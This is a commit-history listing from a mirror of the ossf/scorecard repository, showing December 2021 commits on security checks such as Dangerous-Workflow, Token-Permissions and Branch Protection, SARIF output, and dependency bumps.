ossf/scorecard
1
1
Fork 0
mirror of https://github.com/ossf/scorecard.git synced 2024-09-19 13:07:17 +03:00
Code Issues Actions 2 Packages Projects Releases Wiki Activity
1,005 Commits 36 Branches 42 Tags 436 MiB
cf71c9539c
Commit Graph

1005 Commits

This Branch
This Branch
All Branches
Author SHA1 Message Date
laurentsimon
cf71c9539c
Add details to message for default location in SARIF (#1414) 
* add details to message

* fix
 2021-12-23 19:06:02 +00:00
dependabot[bot]
eef99b5ce0
🌱 Bump actions/setup-go from 2.1.4 to 2.1.5 (#1407) 2021-12-22 08:40:44 -06:00
laurentsimon
3c1e8148d4
Do not expose sarif and policy command (#1405) 
* hide sarif support

* use variable
 2021-12-21 18:05:56 +00:00
laurentsimon
6f21258131
reduce score by 1 (#1404) 2021-12-21 17:28:31 +00:00
dependabot[bot]
090ae4f0bb
🌱 Bump actions/stale from 4.0.0 to 4.1.0 (#1384) 
Bumps [actions/stale](https://github.com/actions/stale) from 4.0.0 to 4.1.0.
- [Release notes](https://github.com/actions/stale/releases)
- [Changelog](https://github.com/actions/stale/blob/main/CHANGELOG.md)
- [Commits](cdf15f641a...7fb802b307)

---
updated-dependencies:
- dependency-name: actions/stale
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
 2021-12-17 17:53:20 +00:00
dependabot[bot]
f9daa4e3cc
🌱 Bump github.com/rhysd/actionlint from 1.6.7 to 1.6.8 (#1267) 
Bumps [github.com/rhysd/actionlint](https://github.com/rhysd/actionlint) from 1.6.7 to 1.6.8.
- [Release notes](https://github.com/rhysd/actionlint/releases)
- [Changelog](https://github.com/rhysd/actionlint/blob/main/CHANGELOG.md)
- [Commits](https://github.com/rhysd/actionlint/compare/v1.6.7...v1.6.8)

---
updated-dependencies:
- dependency-name: github.com/rhysd/actionlint
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
 2021-12-17 17:24:32 +00:00
laurentsimon
df3d50df76
🐛 Fix score calculation for multiple files (#1401) 
* multi file support

* fix multi-files permissions

* change name

* add tests

* use struct for files

* comments

* comment
 2021-12-16 23:16:02 +00:00
laurentsimon
3d9b1d2900
[RAW] Branch Protection support (#1396) 
* raw bp

* missing files

* context never nil

* support raw bp

* unit tests

* remove comments

* merging

* linter
 2021-12-16 21:42:05 +00:00
asraa
c795615321
Enable dangerous workflow in release test (#1402) 
* enable dangerous workflow in release test

Signed-off-by: Asra Ali <asraa@google.com>

* fix

Signed-off-by: Asra Ali <asraa@google.com>

Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
 2021-12-16 18:49:49 +00:00
Azeem Shaikh
26733c95be
Update timeout for retries (#1403) 
Co-authored-by: Azeem Shaikh <azeems@google.com>
 2021-12-16 10:25:35 -08:00
Azeem Shaikh
be7fe32866
Fix more retry breakages (#1398) 
Co-authored-by: Azeem Shaikh <azeems@google.com>
 2021-12-15 23:27:23 +00:00
Azeem Shaikh
ecc96576f4
Refactor to improve readability (#1394) 
Co-authored-by: Azeem Shaikh <azeems@google.com>
 2021-12-15 15:01:34 -08:00
Azeem Shaikh
bbbca2bd87
Fix retry workflow (#1397) 
Co-authored-by: Azeem Shaikh <azeems@google.com>
 2021-12-15 14:31:46 -08:00
naveen
a13b63eae2 🌱 Improves the ci-e2e with retries 2021-12-15 12:50:36 -06:00
laurentsimon
f2cee41ca9
[RAW]: dependency update tool (#1391) 
* dependency update tool

* rename

* missing files

* add fields

* rm field
 2021-12-15 17:02:31 +00:00
Jason Hall
cef72f0f7d
🐛 Fix ko build workflows in Makefile (#1392) 
* Use ko to build everything in cloudbuild.yaml

* --push=false and undo cloudbuild.yaml changes for now
 2021-12-15 10:35:07 -06:00
laurentsimon
46e94eb925
[DRAFT: RAW]: Security policy support (#1372) 
* raw sec policy

* missing file

* fix validation of check.yml

* updates

* comments

* dea code

* comments
 2021-12-14 23:51:42 +00:00
laurentsimon
551961718d
[RAW] End-to-end support for raw results for Binary-Artifacts (#1255) 
* split binary artifact check

* fix

* missing file

* comments

* fix

* comments

* draft

* merge fix

* fix merge

* add indirection

* comments

* comments

* linter

* comments

* updates

* updates

* updates

* linter

* comments
 2021-12-14 21:10:24 +00:00
Chris McGehee
f991fee32d
Adding line numbers for rest of Token-Permessions (and by extension, (#1381) 
Packaging)
 2021-12-14 04:14:35 +00:00
laurentsimon
ca97581538
Comply with GH-specific rules for SARIF (#1379) 
* GH-specific validation rules

* fix

* fix
 2021-12-14 01:47:57 +00:00
Naveen
a0513aa877 Update stale.yml 2021-12-13 16:53:51 -06:00
olivekl
d4df1f6136
Update README.md (#1388) 
Update link for more useful GH app authentication instructions
 2021-12-13 20:50:43 +00:00
olivekl
fa29896003
Clarify Authentication and Token info in README.md (#1387) 
Add suggestion of which PAT to set;
Add explanation of why authentication is needed;
Clarity the "either-or" options for authentication;
Add link to GH Installations (please confirm link is correct)
 2021-12-13 10:08:19 -08:00
Naveen
9c89717239
🌱 Fix the stale configuration. (#1385) 
The number of issues and PR aren't getting attention and this will help
us with this.
 2021-12-13 08:52:01 -08:00
dependabot[bot]
870a850cc3
🌱 Bump github.com/onsi/gomega from 1.16.0 to 1.17.0 (#1225) 
Bumps [github.com/onsi/gomega](https://github.com/onsi/gomega) from 1.16.0 to 1.17.0.
- [Release notes](https://github.com/onsi/gomega/releases)
- [Changelog](https://github.com/onsi/gomega/blob/master/CHANGELOG.md)
- [Commits](https://github.com/onsi/gomega/compare/v1.16.0...v1.17.0)

---
updated-dependencies:
- dependency-name: github.com/onsi/gomega
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
 2021-12-12 15:25:44 +00:00
laurentsimon
86fd966dc4
Don't use the policy filename in SARIF results (#1373) 
* don't display a policy file

* fix utests

* update msg

* update test
 2021-12-10 17:07:32 -08:00
asraa
cfa1593e1c
Add Script Injection to Dangerous-Workflow (#1368) 
* add dangerous workflow pattern script injection

Signed-off-by: Asra Ali <asraa@google.com>

* add more tests

Signed-off-by: Asra Ali <asraa@google.com>

* update laurent comments

Signed-off-by: Asra Ali <asraa@google.com>
 2021-12-09 13:53:55 -08:00
Jamie Magee
777713901e docs: add installation instructions for mac and linux 2021-12-08 18:27:41 -06:00
Evgeny Vereshchagin
75bcc333de
CI-Tests: look for test-related strings in target urls as well (#1374) 
Apparently some projects like systemd and bcc put links (containing
the word "Jenkins") to their Jenkins instances in target urls.

https://buildbot.iovisor.org/jenkins/job/bcc-pr/1157/
https://jenkins-systemd.apps.ocp.ci.centos.org/job/upstream-vagrant-archlinux-sanitizers/8288/

It's a follow-up to https://github.com/ossf/scorecard/pull/1293#issuecomment-976384882

Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
 2021-12-08 17:34:28 +00:00
Evgeny Vereshchagin
01ebb0dcf3
Pinned-Dependencies: show where exactly parsing fails (#1297) 
Looks like due to https://github.com/mvdan/sh/issues/636
scorecard can't parse comments quoted with backticks like
```
cmd -a \
    -b `# withouth backticks -c below would be a separate command` \
    -c
```
and fails with something like
```
error parsing shell code: 82:26: reached EOF without closing quote `
```

This PR turns that message into
```
error parsing shell code: vagrant/bootstrap_scripts/arch-sanitizers-clang.sh: 82:26: reached EOF without closing quote `
```
which is a bit more useful.

Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
 2021-12-08 01:52:08 +00:00
laurentsimon
6e013cf67d
Token-Permission: Allow top level permissions not defined if all run level permissions are (#1356) 
* doc

* allow non defined top level

* fix

* e2e fix

* linter
 2021-12-08 01:18:28 +00:00
Evgeny Vereshchagin
2e391503e4
Code-Review: show PRs merged without code review (#1375) 
to make it easier to figure out whether those PRs are really merged
without code review or whether there is a bug in scorecard like
https://github.com/ossf/scorecard/issues/1260 that prevents it
from finding reviewed PRs. Other than that, the "CI-Tests" check
already show "untested" PRs so it seems the "Code-Review" check
should follow suit.
 2021-12-07 16:47:29 -08:00
Chen
be9a6234b5
Update the Risk of dangerous-workflow (#1361) 
Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
 2021-12-07 18:00:36 +00:00
Evgeny Vereshchagin
5043cbcc7c
CI-Tests: no longer fail if there are no check suites (#1335) 
In PRs like https://github.com/iovisor/bcc/pull/3626 no checks suites
are triggered:
```
$ curl --silent  -H "Accept: application/vnd.github.v3+json"   3fcf0f1b58/check-runs
{
  "total_count": 0,
  "check_runs": [

  ]
}
```
```
 curl --silent  -H "Accept: application/vnd.github.v3+json"   3fcf0f1b58/check-suites
{
  "total_count": 0,
  "check_suites": [

  ]
}
```
The check should just keep going because "statuses" still can be
triggered so it should use them instead:
```

Closes https://github.com/ossf/scorecard/issues/1285

Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
 2021-12-07 03:27:59 +00:00
laurentsimon
1aac7aa39c
update log msg for non-pinned actions (#1370) 2021-12-06 19:33:27 -06:00
laurentsimon
063d384b6d
move dir (#1367) 2021-12-06 17:57:02 +00:00
laurentsimon
023eab671e
Ignore local actions that are not pinned (#1357) 
* ignore local actions

* missing files
 2021-12-06 16:36:42 +00:00
Chris McGehee
38b5199e9e
🐛 Adding line numbers to token-permissions and a couple other places (#1363) 
* Adding line numbers to token-permissions and a couple other places

* Fix deadlink for security policy

Signed-off-by: Batuhan Apaydın <batuhan.apaydin@trendyol.com>
Co-authored-by: Furkan Türkal <furkan.turkal@trendyol.com>

* Updating formatting

Co-authored-by: Batuhan Apaydın <batuhan.apaydin@trendyol.com>
Co-authored-by: Furkan Türkal <furkan.turkal@trendyol.com>
 2021-12-06 10:05:52 -06:00
Batuhan Apaydın
1eb4d0e73e Fix deadlink for security policy 
Signed-off-by: Batuhan Apaydın <batuhan.apaydin@trendyol.com>
Co-authored-by: Furkan Türkal <furkan.turkal@trendyol.com>
 2021-12-05 11:26:29 -06:00
laurentsimon
b323cded04
🐛 checks.yml not sync'ed with checks.md (#1360) 
* update docs

* update

* remove file

* remove  improper commit

* fix
 2021-12-04 08:56:50 -06:00
laurentsimon
afe55a83c1
🐛 Disable pinning lock file search in repo (#1315) 
* fix

* linter

* linter

* linter

* comment
 2021-12-04 00:44:09 +00:00
Evgeny Vereshchagin
9f7e682fe6
CI-Check: add SemaphoreCI and Packit-as-a-Service (#1293) 
to make it more likely for some projects to pass the check

https://semaphoreci.com/
https://github.com/marketplace/packit-as-a-service

Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
 2021-12-03 23:33:01 +00:00
Azeem Shaikh
84d169bf23
Use updated clients for local (#1355) 
Co-authored-by: Azeem Shaikh <azeems@google.com>
 2021-12-03 15:09:04 -08:00
laurentsimon
aed511670f
Cleanup Branch Protection and add e2e tests (#1344) 
* BP cleanup

* linnter

* e2e fix

* linter

* linter

Co-authored-by: asraa <asraa@google.com>
 2021-12-03 21:53:18 +00:00
laurentsimon
3eb2e5aec8
license (#1350) 2021-12-03 21:01:38 +00:00
laurentsimon
b8d7a6b722
make critical (#1348) 2021-12-03 17:55:54 +00:00
Nanik
45b5a35020
Add new checking for license file availability (#1178) 
* Add checking logic inside license_check.go
    * Add test case license_check_test.go
    * Add check information inside checks.yaml
 2021-12-03 09:28:27 -08:00
laurentsimon
8cb4804c28
Update action names (#1346) 
* update action

* add schedule

* comments

* e2e fix
 2021-12-03 02:17:00 +00:00
laurentsimon
c3c017bf6f
npm ci only (#1314) 2021-12-03 01:37:18 +00:00
laurentsimon
938c637ee0
rem audio files (#1300) 
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
 2021-12-03 00:54:06 +00:00